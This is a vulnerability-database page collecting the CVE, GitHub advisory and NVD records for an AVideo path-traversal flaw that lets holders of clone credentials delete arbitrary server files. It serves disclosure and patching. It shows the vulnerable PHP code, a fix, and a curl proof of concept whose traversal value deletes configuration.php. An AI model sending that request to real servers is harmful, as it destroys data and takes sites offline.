Vulnerability-Lookup

CVE-2026-33293 (GCVE-0-2026-33293)

Vulnerability from cvelistv5 – Published: 2026-03-22 16:35 – Updated: 2026-03-24 17:48

Title

AVideo Affected by Arbitrary File Deletion via Path Traversal in CloneSite deleteDump Parameter

Summary

WWBN AVideo is an open source video platform. Prior to version 26.0, the `deleteDump` parameter in `plugin/CloneSite/cloneServer.json.php` is passed directly to `unlink()` without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., `../../`) to delete arbitrary files on the server, including critical application files such as `configuration.php`, causing complete denial of service or enabling further attacks by removing security-critical files. Version 26.0 fixes the issue.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/941decd6d19…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: < 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33293",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-24T17:47:31.294806Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-24T17:48:13.332Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the `deleteDump` parameter in `plugin/CloneSite/cloneServer.json.php` is passed directly to `unlink()` without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., `../../`) to delete arbitrary files on the server, including critical application files such as `configuration.php`, causing complete denial of service or enabling further attacks by removing security-critical files. Version 26.0 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-22T16:35:16.181Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284"
        }
      ],
      "source": {
        "advisory": "GHSA-xmjm-86qv-g226",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo Affected by Arbitrary File Deletion via Path Traversal in CloneSite deleteDump Parameter"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33293",
    "datePublished": "2026-03-22T16:35:16.181Z",
    "dateReserved": "2026-03-18T18:55:47.426Z",
    "dateUpdated": "2026-03-24T17:48:13.332Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33293",
      "date": "2026-04-25",
      "epss": "0.00055",
      "percentile": "0.17033"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33293\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-22T17:17:08.950\",\"lastModified\":\"2026-03-24T21:14:05.510\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. Prior to version 26.0, the `deleteDump` parameter in `plugin/CloneSite/cloneServer.json.php` is passed directly to `unlink()` without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., `../../`) to delete arbitrary files on the server, including critical application files such as `configuration.php`, causing complete denial of service or enabling further attacks by removing security-critical files. Version 26.0 fixes the issue.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Antes de la versi\u00f3n 26.0, el par\u00e1metro \u0027deleteDump\u0027 en \u0027plugin/CloneSite/cloneServer.json.php\u0027 se pasa directamente a \u0027unlink()\u0027 sin ninguna sanitizaci\u00f3n de ruta. Un atacante con credenciales de clonaci\u00f3n v\u00e1lidas puede usar secuencias de salto de ruta (p. ej., \u0027../../\u0027) para eliminar archivos arbitrarios en el servidor, incluyendo archivos cr\u00edticos de la aplicaci\u00f3n como \u0027configuration.php\u0027, causando una denegaci\u00f3n de servicio completa o habilitando ataques adicionales al eliminar archivos cr\u00edticos para la seguridad. La versi\u00f3n 26.0 corrige el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"26.0\",\"matchCriteriaId\":\"B468F0CE-E5E7-4607-BD15-B5763C47493E\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33293\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-24T17:47:31.294806Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-24T17:48:05.525Z\"}}], \"cna\": {\"title\": \"AVideo Affected by Arbitrary File Deletion via Path Traversal in CloneSite deleteDump Parameter\", \"source\": {\"advisory\": \"GHSA-xmjm-86qv-g226\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284\", \"name\": \"https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. Prior to version 26.0, the `deleteDump` parameter in `plugin/CloneSite/cloneServer.json.php` is passed directly to `unlink()` without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., `../../`) to delete arbitrary files on the server, including critical application files such as `configuration.php`, causing complete denial of service or enabling further attacks by removing security-critical files. Version 26.0 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-22T16:35:16.181Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33293\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-24T17:48:13.332Z\", \"dateReserved\": \"2026-03-18T18:55:47.426Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-22T16:35:16.181Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-XMJM-86QV-G226

Vulnerability from github – Published: 2026-03-19 17:12 – Updated: 2026-03-25 18:34

Summary

AVideo Affected by Arbitrary File Deletion via Path Traversal in CloneSite deleteDump Parameter

Details

Summary

The deleteDump parameter in plugin/CloneSite/cloneServer.json.php is passed directly to unlink() without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., ../../) to delete arbitrary files on the server, including critical application files such as configuration.php, causing complete denial of service or enabling further attacks by removing security-critical files.

Details

In plugin/CloneSite/cloneServer.json.php, the $clonesDir variable is set to the application's storage path appended with clones/ (line 11). When a deleteDump GET parameter is provided, its value is concatenated directly into a path passed to unlink() with no validation:

// plugin/CloneSite/cloneServer.json.php:10-11
$videosDir = Video::getStoragePath() . "";
$clonesDir = "{$videosDir}clones/";

// plugin/CloneSite/cloneServer.json.php:44-46
if (!empty($_GET['deleteDump'])) {
    $resp->error = !unlink("{$clonesDir}{$_GET['deleteDump']}");
    $resp->msg = "Delete Dump {$_GET['deleteDump']}";
    die(json_encode($resp));
}

The intended functionality is to delete SQL dump files generated during the clone process (named via uniqid() at line 58). However, because $_GET['deleteDump'] is never passed through basename(), realpath(), or any other path normalization function, an attacker can supply directory traversal sequences to escape the $clonesDir directory.

Given a typical $clonesDir of /var/www/html/videos/clones/, the payload ../../videos/configuration.php resolves to /var/www/html/videos/configuration.php.

The authentication guard thisURLCanCloneMe() at line 38 requires a valid URL and matching key for an admin-approved clone entry (status === 'a'). This is a service-level credential, not an admin session — any approved clone partner possesses these credentials as part of normal operations.

The legitimate clone client at cloneClient.json.php:275 only sends server-generated $json->sqlFile values (produced by uniqid()), but nothing prevents a holder of valid credentials from crafting a manual HTTP request with an arbitrary deleteDump value.

PoC

Prerequisites: A valid clone URL and key pair registered and approved by an admin.

Step 1: Verify the target file exists (e.g., the application configuration file).

curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 200 (or 302/403 — file exists and is served/protected)

Step 2: Send the path traversal payload via the deleteDump parameter.

curl -s "https://avideo.local/plugin/CloneSite/cloneServer.json.php?url=https://approved-clone.local&key=VALID_CLONE_KEY&deleteDump=../../videos/configuration.php"

Expected response:

{"error":false,"msg":"Delete Dump ..\/..\/videos\/configuration.php","url":"https:\/\/approved-clone.local","key":"VALID_CLONE_KEY","useRsync":0,"videosDir":"\/var\/www\/html\/videos\/","sqlFile":"","videoFiles":[],"photoFiles":[]}

"error":false confirms unlink() returned true — the file was successfully deleted.

Step 3: Confirm deletion.

curl -s "https://avideo.local/videos/configuration.php" -o /dev/null -w "%{http_code}"
# Expected: 404 or 500 — file no longer exists

Step 4: At this point the entire AVideo application is broken, as configuration.php contains database credentials and is require_once'd by nearly every endpoint.

Impact

Arbitrary file deletion: An attacker can delete any file readable by the web server process, including application source code, configuration files, uploaded media, and database dumps containing credentials.
Complete denial of service: Deleting configuration.php renders the entire AVideo installation non-functional. Every page load will fatal-error on the missing require_once.
Security control bypass: Deleting .htaccess files or other access-control configurations can expose otherwise-protected directories and files.
Data loss: Uploaded videos, user photos, and SQL backups stored under the videos directory can be permanently destroyed.
Potential escalation: Deleting specific files (e.g., plugin configurations, auth modules) may weaken the application's security posture and enable further attacks.

Recommended Fix

Apply basename() to the deleteDump parameter to strip any directory traversal components, ensuring the deletion is restricted to files within $clonesDir:

// plugin/CloneSite/cloneServer.json.php:44-48
if (!empty($_GET['deleteDump'])) {
    $deleteDump = basename($_GET['deleteDump']);
    $filePath = "{$clonesDir}{$deleteDump}";
    if (strpos(realpath($filePath), realpath($clonesDir)) !== 0) {
        $resp->msg = "Invalid file path";
        die(json_encode($resp));
    }
    $resp->error = !unlink($filePath);
    $resp->msg = "Delete Dump {$deleteDump}";
    die(json_encode($resp));
}

The fix applies defense-in-depth: basename() strips path components, and the realpath() check ensures the resolved path is still within the intended directory even if basename() behavior changes across PHP versions.

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "25.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33293"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T17:12:04Z",
    "nvd_published_at": "2026-03-22T17:17:08Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `deleteDump` parameter in `plugin/CloneSite/cloneServer.json.php` is passed directly to `unlink()` without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., `../../`) to delete arbitrary files on the server, including critical application files such as `configuration.php`, causing complete denial of service or enabling further attacks by removing security-critical files.\n\n## Details\n\nIn `plugin/CloneSite/cloneServer.json.php`, the `$clonesDir` variable is set to the application\u0027s storage path appended with `clones/` (line 11). When a `deleteDump` GET parameter is provided, its value is concatenated directly into a path passed to `unlink()` with no validation:\n\n```php\n// plugin/CloneSite/cloneServer.json.php:10-11\n$videosDir = Video::getStoragePath() . \"\";\n$clonesDir = \"{$videosDir}clones/\";\n```\n\n```php\n// plugin/CloneSite/cloneServer.json.php:44-46\nif (!empty($_GET[\u0027deleteDump\u0027])) {\n    $resp-\u003eerror = !unlink(\"{$clonesDir}{$_GET[\u0027deleteDump\u0027]}\");\n    $resp-\u003emsg = \"Delete Dump {$_GET[\u0027deleteDump\u0027]}\";\n    die(json_encode($resp));\n}\n```\n\nThe intended functionality is to delete SQL dump files generated during the clone process (named via `uniqid()` at line 58). However, because `$_GET[\u0027deleteDump\u0027]` is never passed through `basename()`, `realpath()`, or any other path normalization function, an attacker can supply directory traversal sequences to escape the `$clonesDir` directory.\n\nGiven a typical `$clonesDir` of `/var/www/html/videos/clones/`, the payload `../../videos/configuration.php` resolves to `/var/www/html/videos/configuration.php`.\n\nThe authentication guard `thisURLCanCloneMe()` at line 38 requires a valid URL and matching key for an admin-approved clone entry (status `=== \u0027a\u0027`). This is a service-level credential, not an admin session \u2014 any approved clone partner possesses these credentials as part of normal operations.\n\nThe legitimate clone client at `cloneClient.json.php:275` only sends server-generated `$json-\u003esqlFile` values (produced by `uniqid()`), but nothing prevents a holder of valid credentials from crafting a manual HTTP request with an arbitrary `deleteDump` value.\n\n## PoC\n\n**Prerequisites:** A valid clone URL and key pair registered and approved by an admin.\n\n**Step 1:** Verify the target file exists (e.g., the application configuration file).\n\n```bash\ncurl -s \"https://avideo.local/videos/configuration.php\" -o /dev/null -w \"%{http_code}\"\n# Expected: 200 (or 302/403 \u2014 file exists and is served/protected)\n```\n\n**Step 2:** Send the path traversal payload via the `deleteDump` parameter.\n\n```bash\ncurl -s \"https://avideo.local/plugin/CloneSite/cloneServer.json.php?url=https://approved-clone.local\u0026key=VALID_CLONE_KEY\u0026deleteDump=../../videos/configuration.php\"\n```\n\n**Expected response:**\n\n```json\n{\"error\":false,\"msg\":\"Delete Dump ..\\/..\\/videos\\/configuration.php\",\"url\":\"https:\\/\\/approved-clone.local\",\"key\":\"VALID_CLONE_KEY\",\"useRsync\":0,\"videosDir\":\"\\/var\\/www\\/html\\/videos\\/\",\"sqlFile\":\"\",\"videoFiles\":[],\"photoFiles\":[]}\n```\n\n`\"error\":false` confirms `unlink()` returned `true` \u2014 the file was successfully deleted.\n\n**Step 3:** Confirm deletion.\n\n```bash\ncurl -s \"https://avideo.local/videos/configuration.php\" -o /dev/null -w \"%{http_code}\"\n# Expected: 404 or 500 \u2014 file no longer exists\n```\n\n**Step 4:** At this point the entire AVideo application is broken, as `configuration.php` contains database credentials and is `require_once`\u0027d by nearly every endpoint.\n\n## Impact\n\n- **Arbitrary file deletion:** An attacker can delete any file readable by the web server process, including application source code, configuration files, uploaded media, and database dumps containing credentials.\n- **Complete denial of service:** Deleting `configuration.php` renders the entire AVideo installation non-functional. Every page load will fatal-error on the missing `require_once`.\n- **Security control bypass:** Deleting `.htaccess` files or other access-control configurations can expose otherwise-protected directories and files.\n- **Data loss:** Uploaded videos, user photos, and SQL backups stored under the videos directory can be permanently destroyed.\n- **Potential escalation:** Deleting specific files (e.g., plugin configurations, auth modules) may weaken the application\u0027s security posture and enable further attacks.\n\n## Recommended Fix\n\nApply `basename()` to the `deleteDump` parameter to strip any directory traversal components, ensuring the deletion is restricted to files within `$clonesDir`:\n\n```php\n// plugin/CloneSite/cloneServer.json.php:44-48\nif (!empty($_GET[\u0027deleteDump\u0027])) {\n    $deleteDump = basename($_GET[\u0027deleteDump\u0027]);\n    $filePath = \"{$clonesDir}{$deleteDump}\";\n    if (strpos(realpath($filePath), realpath($clonesDir)) !== 0) {\n        $resp-\u003emsg = \"Invalid file path\";\n        die(json_encode($resp));\n    }\n    $resp-\u003eerror = !unlink($filePath);\n    $resp-\u003emsg = \"Delete Dump {$deleteDump}\";\n    die(json_encode($resp));\n}\n```\n\nThe fix applies defense-in-depth: `basename()` strips path components, and the `realpath()` check ensures the resolved path is still within the intended directory even if `basename()` behavior changes across PHP versions.",
  "id": "GHSA-xmjm-86qv-g226",
  "modified": "2026-03-25T18:34:01Z",
  "published": "2026-03-19T17:12:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33293"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Affected by Arbitrary File Deletion via Path Traversal in CloneSite deleteDump Parameter"
}

FKIE_CVE-2026-33293

Vulnerability from fkie_nvd - Published: 2026-03-22 17:17 - Updated: 2026-03-24 21:14

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E",
              "versionEndExcluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the `deleteDump` parameter in `plugin/CloneSite/cloneServer.json.php` is passed directly to `unlink()` without any path sanitization. An attacker with valid clone credentials can use path traversal sequences (e.g., `../../`) to delete arbitrary files on the server, including critical application files such as `configuration.php`, causing complete denial of service or enabling further attacks by removing security-critical files. Version 26.0 fixes the issue."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Antes de la versi\u00f3n 26.0, el par\u00e1metro \u0027deleteDump\u0027 en \u0027plugin/CloneSite/cloneServer.json.php\u0027 se pasa directamente a \u0027unlink()\u0027 sin ninguna sanitizaci\u00f3n de ruta. Un atacante con credenciales de clonaci\u00f3n v\u00e1lidas puede usar secuencias de salto de ruta (p. ej., \u0027../../\u0027) para eliminar archivos arbitrarios en el servidor, incluyendo archivos cr\u00edticos de la aplicaci\u00f3n como \u0027configuration.php\u0027, causando una denegaci\u00f3n de servicio completa o habilitando ataques adicionales al eliminar archivos cr\u00edticos para la seguridad. La versi\u00f3n 26.0 corrige el problema."
    }
  ],
  "id": "CVE-2026-33293",
  "lastModified": "2026-03-24T21:14:05.510",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-22T17:17:08.950",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/941decd6d19e2e694acb75e86317d10fbb560284"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xmjm-86qv-g226"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33293 (GCVE-0-2026-33293)

GHSA-XMJM-86QV-G226

Summary

Details

PoC

Impact

Recommended Fix

FKIE_CVE-2026-33293

Tags

Sightings

Nomenclature